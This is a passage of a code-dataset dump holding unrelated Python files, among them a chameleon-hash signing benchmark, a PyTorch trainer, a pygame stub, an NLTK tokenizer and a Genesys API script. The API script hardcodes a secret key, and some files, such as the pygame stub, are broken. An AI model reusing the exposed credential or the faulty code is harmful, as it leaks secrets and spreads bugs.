vez!!')\n","sub_path":"Desafio04.py","file_name":"Desafio04.py","file_ext":"py","file_size_in_byte":1478,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"378685945","text":"# n个用户,n个PK,SK,r,CH=g^m*h1^r1*h2^r2……hn^rn mod p\r\n#Setup(),KeyGen(),ChameleonHash(),Forge()四个函数\r\nimport random\r\nimport requests\r\nfrom bs4 import BeautifulSoup\r\nimport re\r\nimport pandas as pd\r\nfrom pyunit_prime import get_large_prime_length #随机生成指定长度大素数\r\nfrom pyunit_prime import is_prime #判断素数\r\nfrom pyunit_prime import prime_range #输出指定区间素数\r\nimport math\r\nimport myrsa\r\nimport base64\r\nimport hashlib\r\nimport rsa\r\nfrom rsa import common, transform, core\r\nfrom rsa.pkcs1 import _pad_for_signing\r\nfrom ecdsa import SigningKey\r\nimport time\r\n\r\nlength = 128\r\nglobal p,q,g,n,i,SKlist,PKlist,rlist,CHpublic,CHprivate,r1\r\nglobal sizes \r\np,q,g = 0,0,0\r\nChSign_public_key, ChSign_private_key = myrsa.newkeys()\r\n\r\ndef primeFactorization(k):#分解质因数\r\n while True:\r\n q=get_large_prime_length(length)\r\n p=(q*k+1)if(k%2==0)else(q*(k+1)+1)\r\n if is_prime(p)==True:\r\n break\r\n else:\r\n continue\r\n primeList=prime_range(2,int(math.sqrt(k)))\r\n result=[[0,0] for i in range(len(primeList))]\r\n for i in range(len(primeList)):\r\n result[i][0]=primeList[i]\r\n while k%primeList[i]==0:\r\n result[i][1]+=1\r\n k=k//primeList[i]\r\n if k!=1:\r\n result.append([k,1])\r\n result.append([q,1])\r\n return result,p,q \r\n\r\ndef quickPower(a,b,c):#快速幂,a^b mod c\r\n result=1\r\n while b>0:\r\n if b%2==1:\r\n result=result*a%c\r\n a=a*a%c\r\n b>>=1\r\n return result\r\n\r\ndef getGenerator(result,p,q): #get g\r\n generator=random.randint(1,1000)\r\n while True:\r\n if quickPower(generator,q,p)!=1:\r\n generator+=1\r\n else:\r\n for i in range(len(result)):\r\n if quickPower(generator,int((p-1)/result[i][0]),p)==1:\r\n break\r\n if i!=len(result)-1:\r\n generator+=1\r\n else:\r\n break\r\n return generator\r\n\r\ndef Setup(k):#input the security number k\r\n factorization,p,q=primeFactorization(k)\r\n g=getGenerator(factorization,p,q)\r\n return p,q,g\r\n\r\ndef getSecretKey(n,q): #get SKlist,x1,x2……xn\r\n SKlist=[]\r\n for _ in range(n):\r\n SKlist.append(random.randint(1,q))\r\n return SKlist\r\n\r\ndef getPublicKey(g,SKlist,n,p):#get PKlist,h1,h2……hn\r\n PKlist=[]\r\n for i in range(n):\r\n PKlist.append(quickPower(g,SKlist[i],p))\r\n return PKlist\r\n\r\ndef KeyGen(p,q,g,n):#输出是哈希公钥和私钥\r\n SKlist=getSecretKey(n,q)\r\n PKlist=getPublicKey(g,SKlist,n,p)\r\n return SKlist,PKlist\r\n\r\ndef getr(n,q):# rlist,r1,r2……rn\r\n rlist=[]\r\n for _ in range(n):\r\n rlist.append(random.randint(1,q))\r\n return rlist\r\n\r\ndef treatMSG(msg): #处理消息msg为整数\r\n newmsg=''\r\n for i in msg:\r\n newmsg+=str(ord(i))\r\n return int(newmsg)#把所有字母的ASCII码拼接起来再转化为int类型\r\n\r\ndef ChameleonHash(CHpublickey,m,r):#变色龙哈希\r\n newm=treatMSG(m)\r\n CH=quickPower(g,newm,p)\r\n CH=CH*quickPower(CHpublickey,r,p)\r\n CH=CH%p\r\n return CH\r\n\r\ndef exgcd(a,b):#扩展欧几里得 找到x和y,使得: a*x + b*y = gcd为最大公因子\r\n if b==0:\r\n return 1,0,a\r\n else:\r\n x,y,gcd=exgcd(b,a%b)\r\n x,y=y,(x-(a//b)*y)\r\n return x,y,gcd\r\n\r\ndef Forge(CHprivatekey,m1,r,m2):#求r',线性同余方程\r\n newm1=treatMSG(m1) #处理消息msg为整数\r\n newm2=treatMSG(m2) #处理消息msg为整数\r\n x,y,gcd=exgcd(CHprivatekey,q)\r\n result=x*(newm1-newm2+CHprivatekey*r)%q\r\n return result\r\n\r\ndef signature_hhj(after_hash, private_key, encoding='utf8'):\r\n after_hash1 = str(after_hash)\r\n after_hash2 = after_hash1.encode(encoding)\r\n prider = base64.b64decode(private_key)\r\n priv_key = rsa.PrivateKey.load_pkcs1(prider, 'DER')\r\n keylength = common.byte_size(priv_key.n)\r\n block_length = keylength - 11\r\n assert block_length > 0, 'nbits of key is to small, please set bigger then 128!'\r\n signature = b''\r\n while after_hash2:\r\n cleartext = after_hash2[:block_length]\r\n after_hash2 = after_hash2[block_length:]\r\n # ===== copy from rsa.pkcs1:sign_hash =====\r\n padded = _pad_for_signing(cleartext, keylength)\r\n payload = transform.bytes2int(padded)\r\n encrypted = priv_key.blinded_encrypt(payload)\r\n block = transform.int2bytes(encrypted, keylength)\r\n signature += block\r\n signature = base64.b64encode(signature).decode()\r\n #print(\"--------------签名成功--------------\")\r\n return signature\r\n\r\ndef verify_hhj(after_hash, signature, publickey, encoding='utf8'):\r\n after_hash1 = str(after_hash)\r\n signature_full = base64.b64decode(signature)\r\n pubder = base64.b64decode(publickey)\r\n pub_key = rsa.PublicKey.load_pkcs1(pubder, 'DER')\r\n keylength = common.byte_size(pub_key.n)\r\n decrypted_hash = b''\r\n while signature_full:\r\n signature = signature_full[:keylength]\r\n signature_full = signature_full[keylength:]\r\n encrypted = transform.bytes2int(signature)\r\n decrypted = core.decrypt_int(encrypted, pub_key.e, pub_key.n)\r\n clearsig = transform.int2bytes(decrypted, keylength)\r\n if clearsig[0:2] != b'\\x00\\x01':\r\n return False\r\n clearsig = clearsig[2:]\r\n if b'\\x00' not in clearsig:\r\n return False\r\n sep_idx = clearsig.index(b'\\x00')\r\n clearsig = clearsig[sep_idx + 1:]\r\n decrypted_hash += clearsig\r\n decrypted_hash = str(decrypted_hash,'utf-8')\r\n return decrypted_hash == after_hash1\r\n\r\ndef Chameleonsign(CHpublickey,m,r,private_key):\r\n Hash = ChameleonHash(CHpublickey,m,r)\r\n return signature_hhj(Hash,private_key)\r\n\r\ndef Chsign_Verify(CHpublickey,m,r,signature,public_key):\r\n Hash = ChameleonHash(CHpublickey,m,r)\r\n return verify_hhj(Hash,signature,public_key)\r\n\r\ndef getRandomSet(bits):\r\n num_set = [chr(i) for i in range(48,58)]\r\n char_set = [chr(i) for i in range(97,123)]\r\n total_set = num_set + char_set\r\n ram = ''\r\n s = int(bits/20)\r\n for i in range(s):\r\n value_set = \"\".join(random.sample(total_set, 20))\r\n ram = ram + value_set\r\n a = bits%20\r\n for i in range(a):\r\n value_set = \"\".join(random.sample(total_set, 1))\r\n ram = ram + value_set\r\n return ram\r\n\r\ndef Calculate_Time(n,method):\r\n global sizes \r\n if n == 1:\r\n print(\"数据规模太小\")\r\n return\r\n random_list = []\r\n for i in range(n):\r\n strings = getRandomSet(sizes)\r\n random_list.append(strings)\r\n if method == \"Chameleon\":\r\n rlist=[]\r\n for _ in range(n):\r\n rlist.append(random.randint(1,q))\r\n #print(rlist)\r\n time_CHSign_Start = time.time()\r\n for i in range(n):#0~n-1\r\n if i == 0:\r\n Chameleonsign(CHpublic,random_list[i],rlist[i],ChSign_private_key)\r\n else:\r\n rlist[i] = Forge(CHprivate,random_list[0],rlist[0],random_list[i])\r\n time_CHSign_End = time.time()\r\n return time_CHSign_End-time_CHSign_Start\r\n elif method == \"ECDSA\":\r\n ecdsa_private_key = SigningKey.generate()\r\n ecdsa_public_key = ecdsa_private_key.verifying_key\r\n time_ecdsa_start = time.time()\r\n for i in range(n):\r\n ecdsa_message=bytes(random_list[i], encoding='utf-8')\r\n ecdsa_signature = ecdsa_private_key.sign(ecdsa_message)\r\n #ecdsa_public_key.verify(ecdsa_signature, ecdsa_message)\r\n time_ecdsa_end = time.time()\r\n return time_ecdsa_end - time_ecdsa_start\r\n else:\r\n print('please input: \"ECDSA\" OR \"Chameleon\"')\r\n return None\r\n\r\ndef test(k):\r\n global p,q,g,n,i,SKlist,PKlist,rlist,CHpublic,CHprivate,r1\r\n init(k)#传入安全参数k \r\n print(\"安全参数为%d,以下为测试用例:\\n\" % k)\r\n print('q:',q)\r\n print('p:',p)\r\n print('g:',g)\r\n print('变色龙哈希私钥列表为:',SKlist)\r\n print('变色龙哈希公钥列表为:',PKlist)\r\n print('变色龙哈希随机数列表为:',rlist)\r\n print('')\r\n m1='messageuestc1'#消息1\r\n m2='hhj2'#消息2\r\n CH=ChameleonHash(CHpublic,m1,r1)\r\n print('消息1为:',m1)\r\n print('随机数1为:',r1)\r\n print('变色龙哈希:',CH)\r\n print('')\r\n rand2=Forge(CHprivate,m1,r1,m2)\r\n newCH=ChameleonHash(CHpublic,m2,rand2)\r\n print('消息2为:',m2)\r\n print('随机数2为:',rand2)\r\n print('碰撞的变色龙哈希:',newCH)\r\n print('')\r\n print(\"变色龙签名公钥为:\"+ChSign_public_key)\r\n print(\"变色龙签名私钥为:\"+ChSign_private_key)\r\n signature = Chameleonsign(CHpublic,m1,r1,ChSign_private_key)\r\n print('变色龙签名结果:'+signature)\r\n verify = Chsign_Verify(CHpublic,m1,r1,signature,ChSign_public_key)\r\n if verify:\r\n print('签名验证成功')\r\n else:\r\n print('签名验证失败')\r\n\r\ndef init(k):\r\n global p,q,g,n,i,SKlist,PKlist,rlist,CHpublic,CHprivate,r1\r\n n=5 #用户数为n\r\n i=2#第i个用户\r\n p,q,g=Setup(k)#根据安全参数生成p,q,g\r\n SKlist,PKlist=KeyGen(p,q,g,n)\r\n rlist=getr(n,q)\r\n CHpublic,CHprivate,r1 = PKlist[i-1],SKlist[i-1],rlist[i-1]\r\n print('\\n')\r\n print('------------------------------------------数据初始化完成------------------------------------------\\n')\r\n return\r\n\r\nif __name__ == \"__main__\":\r\n global sizes \r\n k = 128\r\n #test(k)#输出测试用例\r\n init(k)#传入安全参数k \r\n data_m=[\"消息数量:\"]\r\n data_ch=[\"变色龙签名时间:\"]\r\n data_ecdsa=[\"ECDSA签名时间:\"]\r\n scale = [1000,2000,4000,6000,8000,10000] #数据规模为scale\r\n Sign_method =[\"Chameleon\",\"ECDSA\"]\r\n sizes = 100\r\n for j in range(len(scale)):\r\n print(\"处理数据规模:\",scale[j],\"条\",sizes,\"B的消息\")\r\n data_m.append(scale[j])\r\n for i in range(len(Sign_method)):\r\n time_Consume = round(Calculate_Time(scale[j],Sign_method[i]),5)\r\n print(Sign_method[i]+\" 签名耗时:\",time_Consume,\"s\")\r\n if(i==0):\r\n data_ch.append(time_Consume)\r\n else:\r\n data_ecdsa.append(time_Consume)\r\n print('\\n')\r\n datas=[]\r\n datas.append(data_m)\r\n datas.append(data_ch)\r\n datas.append(data_ecdsa)\r\n df = pd.DataFrame(datas)\r\n df.to_excel(\"C:\\\\Users\\\\12091\\\\Desktop\\\\hhj1.xlsx\", index=None)","sub_path":"Design/乱/HHJ_hash.py","file_name":"HHJ_hash.py","file_ext":"py","file_size_in_byte":10500,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"614194575","text":"import sys,math,random,pygame\n\n# PARAMETRES DU JEU\nWIDTH = 640\nHEIGHT = 480\nFPS = 60\nTITLE = \"Mon jeu\"\nBLEU = (0,0,255)\n\nclass Carre(pygame.sprite.Sprite):\n def _init_(self):\n pygame.sprite.Sprite._init_(self)\n self.image = pygame.Surface(50,50)\n self.image.fill(BLEU)\n self.image.set_colorkey(BLEU)\n\n\n\n# INITIALISATION DU JEU\npygame.init()\nscreen = pygame.display.set_mode((WIDTH,HEIGHT))\npygame.display.set_caption(TITLE);\nrectScreen = screen.get_rect()\n\n\n# ... A COMPLETER AVEC LE CODE DE VOS INITIALISATIONS ...\ncarre = pygame.image.load(\"bleu-carre.png\").convert_alpha()\nrectCarre = bleu-carre.get_rect()\nrectChat.topleft = (100,50)\n# BOUCLE DE JEU\nclock = pygame.time.Clock()\nwhile True:\n\ttime = clock.tick(FPS)\n\n\t# GESTION DES EVENEMENTS\n\tfor event in pygame.event.get():\n\t\tif event.type == pygame.QUIT:\n\t\t\tpygame.quit()\n\t\t\tsys.exit(0)\nscreen.blit(carre,rectCarre)\n\n\n\t# ... A COMPLETER AVEC LE CODE DE VOTRE JEU ...\n\n\t# MAJ DE L'AFFICHAGE\n\n\n\n","sub_path":"Axel-Dany-Gaston/Pyagme_projekt+gaston.py","file_name":"Pyagme_projekt+gaston.py","file_ext":"py","file_size_in_byte":980,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"570061731","text":"import logging\n\nimport openeo\n\n#enable logging in requests library\nlogging.basicConfig(level=logging.DEBUG)\n\n#connect with VITO backend\nconnection = openeo.connect(\"https://openeo.vito.be\")\n\n#retrieve the list of available collections\ncollections = connection.list_collections()\nprint(collections)\n\n#create image collection\ns2_fapar = connection.load_collection(\"BIOPAR_FAPAR_V1_GLOBAL\",\n spatial_extent={'west':16.138916,'east':16.524124,'south':48.1386,'north':48.320647,'crs':4326},\n temporal_extent=[\"2016-01-01\",\"2016-03-10\"] )\n\n#specify process graph\ndownload = s2_fapar \\\n .max_time() \\\n .download(\"/tmp/openeo-composite.geotiff\",format=\"GeoTiff\")\nprint(download)","sub_path":"examples/download_composite.py","file_name":"download_composite.py","file_ext":"py","file_size_in_byte":698,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"405894122","text":"import subprocess\nimport datetime\nimport argparse\n\nimport google_sheet as gs\nimport email_stats\n\nparser = argparse.ArgumentParser(description='Pass environment to kick off gfw-sync cron job.')\nparser.add_argument('--environment', '-e', default='DEV', choices=('DEV', 'PROD'),\n help='the environment/config files to use for this run')\nargs = parser.parse_args()\n\n\ndef parse_update_freq(field_text):\n \"\"\"\n Read the update_freq field from the config table and determine if the layer in question needs to be updated today\n :param field_text: the value in the update_freq column\n :return:\n \"\"\"\n update_layer = False\n\n # Check that the layer has an update frequency first\n if field_text:\n\n # If the field text has brackets, let's examine it\n if field_text[0] == '[' and field_text[-1] == ']':\n field_text = field_text.replace('[', '').replace(']', '')\n\n # If it has '-', assume it's a range and build a list\n if '-' in field_text:\n start_day, end_day = field_text.split('-')\n day_list = range(int(start_day), int(end_day) + 1)\n\n # Otherwise assume it's a list of dates\n else:\n day_list_text = field_text.split(',')\n day_list = [int(x.strip()) for x in day_list_text]\n\n else:\n day_list = []\n\n # Check to see if today's date is in the list we just built\n # If so, update this layer\n if datetime.datetime.now().day in day_list:\n update_layer = True\n\n return update_layer\n\n\t\ndef main():\n\tall_layer_dict = gs.sheet_to_dict(args.environment)\n\n\tfor layername, layerdef in all_layer_dict.iteritems():\n\n\t\tupdate_layer_today = parse_update_freq(layerdef['update_days'])\n\n\t\tif update_layer_today:\n\t\t\tsubprocess.call(['python', 'gfw-sync.py', '-l', layername, '-e', args.environment])\n\n\temail_stats.send_summary()\n\nif __name__ == '__main__':\n main()","sub_path":"utilities/cronjob.py","file_name":"cronjob.py","file_ext":"py","file_size_in_byte":1959,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"546356795","text":"from 淘票票.get_cities import TaoPP\nfrom 淘票票.get_cinmal_length import *\nfrom 淘票票.get_cinmal_href import *\n\ndef main():\n t = TaoPP()\n cities = t.city_list()\n page_len_list = run()\n tc = TaoPPCinemal()\n for i in range(len(cities)):\n city_code = cities[i][\"城市编码\"]\n city_name = cities[i][\"城市名称\"]\n tc.get_msg_save(int(page_len_list[i]), city_code)\n\nif __name__ == '__main__':\n main()","sub_path":"爬虫1/淘票票/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"203395789","text":"import types\nfrom ..base import _wrap\n\n\ndef Count(foo, foo_kwargs=None):\n foo_kwargs = foo_kwargs or {}\n foo = _wrap(foo, foo_kwargs)\n\n async def _count(foo):\n count = 0\n async for gen in foo():\n if isinstance(gen, types.AsyncGeneratorType):\n async for f in gen:\n count += 1\n yield count\n\n elif isinstance(gen, types.GeneratorType):\n for f in gen:\n count += 1\n yield count\n else:\n count += 1\n yield count\n\n return _wrap(_count, dict(foo=foo), name='Count', wraps=(foo,), share=foo)\n\n\ndef Sum(foo, foo_kwargs=None):\n foo_kwargs = foo_kwargs or {}\n foo = _wrap(foo, foo_kwargs)\n\n async def _sum(foo):\n sum = 0\n async for gen in foo():\n if isinstance(gen, types.GeneratorType):\n async for f in gen:\n sum += f\n yield sum\n elif isinstance(gen, types.GeneratorType):\n for f in gen:\n sum += f\n yield sum\n else:\n sum += gen\n yield sum\n\n return _wrap(_sum, dict(foo=foo), name='Sum', wraps=(foo,), share=foo)\n","sub_path":"tributary/asynchronous/calculations/rolling.py","file_name":"rolling.py","file_ext":"py","file_size_in_byte":1290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"472800525","text":"#start webapp\nimport cgi\nform = cgi.FieldStorage()\nsearchterm = form.getvalue('search')\nquestion = searchterm \nprint(question)\nreview = \"This is a review\"\n\n#get answer\n\nURL = \"https://api.genesysappliedresearch.com/v2/knowledge/generatetoken\"\nresponse = requests.post(url = URL, headers={'Accept':'*/*','cache-control':'no-cache','organizationid':'be64cce3-44f8-4cd5-9e12-dbfed265165c','secretkey':'0845a386-ab66-4fe8-a1cb-56ef34a3b658'})\njsonResponse = response.json()\ntoken = jsonResponse['token']\n#now get response\nresponse = requests.post(url = 'https://api.genesysappliedresearch.com/v2/knowledge/knowledgebases/7613d1f7-09a7-41f5-a0ba-94f7f6d91d2f/search', data = '{\"query\":'+question+',\"pageSize\": 5,\"pageNumber\": 1,\"sortOrder\": \"string\",\"sortBy\": \"string\",\"languageCode\":\"en-US\",\"documentType\": \"Faq\"}', headers = {'token':token})\njsonResponse = response.json()\n\nprint(token)\nprint(jsonResponse)\n\n#get best customer reviews\n\n#update client view\n\n#upload customer reviews\n\n","sub_path":"web_hosting/master.py","file_name":"master.py","file_ext":"py","file_size_in_byte":980,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"564938696","text":"numbers = \"1 2 3 4 5 6 7 8 9\"\r\nsymbols = [\"\", \"-\", \"+\"]\r\nequations_list = []\r\n\r\nfor i in range(3):\r\n place1 = numbers.replace(\" \", symbols[i], 1)\r\n for j in range(3):\r\n place2 = place1.replace(\" \", symbols[j], 1)\r\n for k in range(3):\r\n place3 = place2.replace(\" \", symbols[k], 1)\r\n for a in range(3):\r\n place4 = place3.replace(\" \", symbols[a], 1)\r\n for b in range(3):\r\n place5 = place4.replace(\" \", symbols[b], 1)\r\n for c in range(3):\r\n place6 = place5.replace(\" \", symbols[c], 1)\r\n for d in range(3):\r\n place7 = place6.replace(\" \", symbols[d], 1)\r\n for e in range(3):\r\n place8 = place7.replace(\" \", symbols[e], 1)\r\n if eval(place8) == 100:\r\n equations_list.append(place8)\r\n\r\nprint(equations_list)\r\n","sub_path":"University_Python/Equations.py","file_name":"Equations.py","file_ext":"py","file_size_in_byte":1006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"234795352","text":"from nltk import SnowballStemmer, word_tokenize\nfrom nltk.corpus import stopwords\n\nstoplist = stopwords.words('english')\nstoplist += ['.', ',', '?', '-', '–', '«', '»',\n '(', ')', ':', ';', '#', '!', '$', '@', '%', '^', '&', '*', '+', '']\nstemmer = SnowballStemmer('english')\n\ndef parse(text):\n words = word_tokenize(text.lower().strip())\n i = 0\n while i < len(words):\n if words[i] in stoplist:\n words.pop(i)\n else:\n i += 1\n for i in range(len(words)):\n words[i] = stemmer.stem(words[i])\n return words\n","sub_path":"src/tokenizer.py","file_name":"tokenizer.py","file_ext":"py","file_size_in_byte":576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"143221041","text":"# coding:utf-8\nimport torch\nimport torch.nn as nn\nfrom torch.autograd import Variable\nimport torch.optim as optim\nimport torch.nn.functional as F\n\nimport os\nimport time\nimport sys\nimport datetime\nimport ctypes\nimport json\nimport numpy as np\nimport pandas as pd\nimport copy\nfrom tqdm import tqdm\n# import sys,os\n# sys.path.append(os.path.dirname(__file__) + os.sep + '../')\nfrom .helper import optimizer_factory,metric_name2func ,early_stopping,ensureDir\n\nclass Trainer(object):\n\n def __init__(self,\n model=None,\n train_data_loader=None,\n eval_set =None,\n train_times=1000,\n metric = ['auc'],\n opt_method=\"Adam\",\n optimizer = None,\n alpha=0.5,\n weight_decay=0.0,\n lr_decay=0,\n save_steps=100,\n early_stopping_rounds = None,\n verbose =None,\n use_gpu=False,\n checkpoint_dir=None):\n\n self.model = model\n self.train_data_loader = train_data_loader # 一个对象,训练使用的数据集 ,产生一个 epoch 的数据,即 nbatches 个batches的数据\n self.eval_set = eval_set #\n self.train_times = train_times # 训练轮数\n self.metrics = metric\n self.metric_funcs = []\n for mc in self.metrics:\n self.metric_funcs.append(metric_name2func(mc))\n self.criterion = F.binary_cross_entropy_with_logits\n\n self.opt_method = opt_method # 优化器 的名字 字符串\n self.optimizer = optimizer # 相对应的 优化器的对象\n self.alpha = alpha # 学习率\n self.lr_decay = lr_decay # 学习率衰减\n self.weight_decay = weight_decay #\n\n self.early_stopping_rounds = early_stopping_rounds\n self.verbose = verbose\n self.save_steps = save_steps #\n self.scheduler =None\n\n self.use_gpu = use_gpu # 是否使用gpu\n self.checkpoint_dir = checkpoint_dir # 检查点保存地址\n if self.checkpoint_dir!=None:\n ensureDir(checkpoint_dir)\n\n # 训练一个batch 数据的过程\n def train_one_step(self, data):\n self.optimizer.zero_grad()\n outputs = self.model(data) # size is 1\n loss = self.criterion(outputs, data['label'])\n loss.backward()\n self.optimizer.step()\n self.scheduler.step()\n return loss.item()\n\n def get_metric_scores(self,data):\n outputs = self.model.predict_proba(data=data)\n result = {}\n for metric_name,metric_func in zip(self.metrics,self.metric_funcs):\n result[metric_name] = metric_func(data['label'].data.numpy(),outputs)\n return result\n\n # 整个训练过程的 配置,以及调用 一个训练batcch方法的框架\n def run(self):\n if self.use_gpu:\n self.model.cuda()\n # 配置优化器\n self.optimizer = optimizer_factory(self.model,\n opt_method=self.opt_method,\n alpha=self.alpha,\n lr_decay=self.lr_decay,\n weight_decay=self.weight_decay)\n print(\"Finish initializing...\")\n self.scheduler = optim.lr_scheduler.OneCycleLR(optimizer=self.optimizer, pct_start=0.05, div_factor=1.5e3,\n max_lr=1e-2, epochs=self.train_times, steps_per_epoch=len(self.train_data_loader))\n best_value = 0\n stopping_step = 0\n # 在训练模型\n for epoch in range(self.train_times): # 迭代 train_times 次 epoch\n self.model = self.model.train()\n res = 0.0\n for data in self.train_data_loader: # 迭代 nbatches 次 batch\n loss = self.train_one_step(data) # size is 1\n res += loss\n res = res / self.train_data_loader.nbathes\n eval_score = []\n if self.eval_set!= None:\n with torch.no_grad():\n self.model = self.model.eval()\n for dataloder in self.eval_set:\n eval_score.append( self.get_metric_scores(dataloder.get_whole_data()) )\n\n if self.verbose!=None and epoch%self.verbose==0:\n self.verbose_print(epoch,res,eval_score)\n\n if self.save_steps!=None and self.checkpoint_dir and (epoch + 1) % self.save_steps == 0:\n print(\"Epoch %d has finished, saving...\" % (epoch))\n ensureDir(self.checkpoint_dir)\n self.model.save_checkpoint(os.path.join(self.checkpoint_dir + \"-\" + str(epoch) + \".ckpt\"))\n\n if self.early_stopping_rounds!=None:\n early_stopping_score = eval_score[0][self.metrics[0]]\n best_value, stopping_step, should_stop = early_stopping(early_stopping_score,\n best_value,\n stopping_step,\n flag_step=self.early_stopping_rounds)\n if stopping_step == 0 and self.checkpoint_dir!=None:\n if self.model.best_iteration_!=None:\n os.remove(self.checkpoint_dir+f'model_iteration_{self.model.best_iteration_}.pkl')\n self.model.best_iteration_ = epoch\n self.model.save_checkpoint(self.checkpoint_dir+f'model_iteration_{self.model.best_iteration_}.pkl')\n if should_stop:\n print(f\"Training until validation scores don't improve for {self.early_stopping_rounds} rounds\")\n print(f\"best iteration is {self.model.best_iteration_} and best_value is {best_value}\")\n break\n\n\n def verbose_print(self,epoch,loss,eval_score):\n print(f\"[{epoch}] train loss is {loss}\")\n for i,score in enumerate(eval_score):\n score_msg = f' {i}th score '\n for key in score:\n score_msg += f\"{key}:{score[key]} \"\n print(score_msg)\n\n def set_model(self, model):\n self.model = model\n\n def to_var(self, x, use_gpu):\n if use_gpu:\n return Variable(torch.from_numpy(x).cuda())\n else:\n return Variable(torch.from_numpy(x))\n\n def set_use_gpu(self, use_gpu):\n self.use_gpu = use_gpu\n\n def set_alpha(self, alpha):\n self.alpha = alpha\n\n def set_lr_decay(self, lr_decay):\n self.lr_decay = lr_decay\n\n def set_weight_decay(self, weight_decay):\n self.weight_decay = weight_decay\n\n def set_opt_method(self, opt_method):\n self.opt_method = opt_method\n\n def set_train_times(self, train_times):\n self.train_times = train_times\n\n def set_save_steps(self, save_steps, checkpoint_dir=None):\n self.save_steps = save_steps\n if not self.checkpoint_dir:\n self.set_checkpoint_dir(checkpoint_dir)\n\n def set_checkpoint_dir(self, checkpoint_dir):\n self.checkpoint_dir = checkpoint_dir","sub_path":"model/NFM/utility/Trainer.py","file_name":"Trainer.py","file_ext":"py","file_size_in_byte":7215,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"277908525","text":"# Santosh Nepal\r\n# 1001112034\r\n#02/27/2018\r\n#----------------------------------------------------------------------\r\n# This code was originally created by Prof. Farhad Kamangar.\r\n# It has been somewhat modified and updated by Brian A. Dalio for use\r\n# in CSE 4303 / CSE 5365 in the 2018 Spring semester.\r\n\r\n#----------------------------------------------------------------------\r\nclass cl_world :\r\n def __init__( self, objects = [], canvases = [] ) :\r\n self.objects = objects\r\n self.canvases = canvases\r\n\r\n def add_canvas( self, canvas ) :\r\n self.canvases.append( canvas )\r\n canvas.world = self\r\n\r\n def delete_file(self, canvas):\r\n canvas.delete(\"all\")\r\n\r\n def create_graphic_objects( self, canvas ) :\r\n # 1. Create a line that goes from the upper left\r\n # to the lower right of the canvas.\r\n self.objects.append( canvas.create_line(\r\n 0, 0, canvas.cget( \"width\" ), canvas.cget( \"height\" ) ) )\r\n\r\n\r\n self.objects.append( canvas.create_line(\r\n canvas.cget( \"width\" ), 0, 0, canvas.cget( \"height\" ) ) )\r\n\r\n # 3. Create an oval that is centered on the canvas and\r\n # is 50% as wide and 50% as high as the canvas.\r\n self.objects.append( canvas.create_oval(\r\n int( 0.25 * int( canvas.cget( \"width\" ) ) ),\r\n int( 0.25 * int( canvas.cget( \"height\" ) ) ),\r\n int( 0.75 * int( canvas.cget( \"width\" ) ) ),\r\n int( 0.75 * int( canvas.cget( \"height\" ) ) ) ) )\r\n\r\n def redisplay( self, canvas, event ) :\r\n if self.objects :\r\n canvas.coords(self.objects[ 0 ], 0, 0, event.width, event.height )\r\n canvas.coords(self.objects[ 1 ], event.width, 0, 0, event.height )\r\n canvas.coords(self.objects[ 2 ],\r\n int( 0.25 * int( event.width ) ),\r\n int( 0.25 * int( event.height ) ),\r\n int( 0.75 * int( event.width ) ),\r\n int( 0.75 * int( event.height ) ) )\r\n\r\n #----------------------------------------------------------------------\r\n\r\n\r\n def create_figure(self,canvas,X,Y,P1,P2,P3,window,viewportPoints):\r\n canvas.delete(\"all\")\r\n\r\n self.objects.append(\r\n canvas.create_polygon(float(viewportPoints[0])*float(canvas.cget(\"width\")), float(viewportPoints[1])*\r\n float(canvas.cget(\"height\")),float(viewportPoints[0])*float(canvas.cget(\"width\")),\r\n float(viewportPoints[3]) *float(canvas.cget(\"height\")),float(viewportPoints[2])*\r\n float(canvas.cget(\"width\")),float(viewportPoints[3])*\r\n float(canvas.cget(\"height\")),float(viewportPoints[2])*float(canvas.cget(\"width\")),\r\n float(viewportPoints[1])*float(canvas.cget(\"height\")),fill='',outline='black'))\r\n\r\n Sx = (float(viewportPoints[2]) - float(viewportPoints[0]))/(float(window[2]) - float(window[0]))\r\n Sy = (float(viewportPoints[3]) - float(viewportPoints[1]))/(float(window[3]) - float(window[1]))\r\n height = int(canvas.cget(\"height\"))\r\n\r\n for i in range(len(P1)):\r\n dx1 = float(X[ int(P1[i])-1]) - float(window[0])\r\n dy1 = float(Y[ int(P1[i]) -1]) -float(window[1])\r\n\r\n dx2 = float(X[ int(P2[i])-1]) - float(window[0])\r\n dy2 = float(Y[ int(P2[i]) -1]) -float(window[1])\r\n\r\n dx3 = float(X[ int(P3[i])-1]) - float(window[0])\r\n dy3 = float(Y[ int(P3[i]) -1]) -float(window[1])\r\n\r\n\r\n X1Prime = (dx1 * Sx) + float(viewportPoints[0])\r\n Y1Prime = height -(((dy1 * Sy) + float(viewportPoints[1])) * height)\r\n X2Prime = (dx2 * Sx) + float(viewportPoints[0])\r\n Y2Prime = height-(((dy2 * Sy) + float(viewportPoints[1])) * height)\r\n X3Prime = (dx3 * Sx) + float(viewportPoints[0])\r\n Y3Prime = height -(((dy3 * Sy) + float(viewportPoints[1])) * height)\r\n\r\n self.objects.append(canvas.create_polygon(X1Prime * int(canvas.cget(\"width\")),Y1Prime,X2Prime * int(canvas.cget(\"width\")),Y2Prime,X3Prime* int(canvas.cget(\"width\")),Y3Prime,fill='white', outline='black'))\r\n\r\n\r\n","sub_path":"Python/Graphics/Graphics_asisgnment1/myGraphics.py","file_name":"myGraphics.py","file_ext":"py","file_size_in_byte":4335,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"351701124","text":"#coding:utf-8\n\nclass 